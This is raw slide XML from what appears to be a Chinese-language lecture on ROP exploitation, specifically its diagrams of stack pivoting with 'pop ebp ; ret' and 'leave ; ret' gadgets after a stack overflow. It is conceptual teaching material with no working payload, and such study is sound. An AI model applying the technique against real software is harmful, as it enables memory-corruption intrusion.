          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="290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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1823" name="Shape 1823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="290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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1824" name="Shape 1824"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9988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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1825" name="Shape 1825"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="425600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772EDA22-2AE2-4CC2-89DE-74CF518521EB}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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829"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1830" name="Shape 1830"/>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1831" name="Shape 1831"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="763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pop ebp ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1832" name="Shape 1832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="3000400" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1833" name="Shape 1833"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1831" idx="1"/>
            <a:endCxn id="1832" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1834" name="Shape 1834"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="3610860"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1835" name="Shape 1835"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="3815660"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1836" name="Shape 1836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="30004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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1837" name="Shape 1837"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1836" idx="0"/>
            <a:endCxn id="1832" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="655600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1838" name="Shape 1838"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="20952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600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1839" name="Shape 1839"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="30004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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1840" name="Shape 1840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="763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leave ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1841" name="Shape 1841"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1832" idx="0"/>
            <a:endCxn id="1839" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="1076400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1842" name="Shape 1842"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1840" idx="1"/>
            <a:endCxn id="1839" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="1770400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Shape 1843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="2904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44" name="Shape 1844"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="763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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1845" name="Shape 1845"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5392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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1846" name="Shape 1846"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1839" idx="0"/>
            <a:endCxn id="1847" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="948800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1848" name="Shape 1848"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="290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new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1847" name="Shape 1847"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="30004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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1849" name="Shape 1849"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="290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1850" name="Shape 1850"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1851" name="Shape 1851"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1850" idx="1"/>
            <a:endCxn id="1847" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1852" name="Shape 1852"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="290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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1853" name="Shape 1853"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="290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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1854" name="Shape 1854"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9988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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1855" name="Shape 1855"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="425600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CF2195-48C4-47E2-A0C1-7D557935D02B}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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859"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1860" name="Shape 1860"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1861" name="Shape 1861"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="763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pop ebp ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1862" name="Shape 1862"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="30004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pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1863" name="Shape 1863"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1861" idx="1"/>
            <a:endCxn id="1862" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1864" name="Shape 1864"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="2567207"/>
            <a:ext cx="848800" cy="40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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1865" name="Shape 1865"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="2772007"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1866" name="Shape 1866"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="30004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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1867" name="Shape 1867"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1866" idx="0"/>
            <a:endCxn id="1862" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="655600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
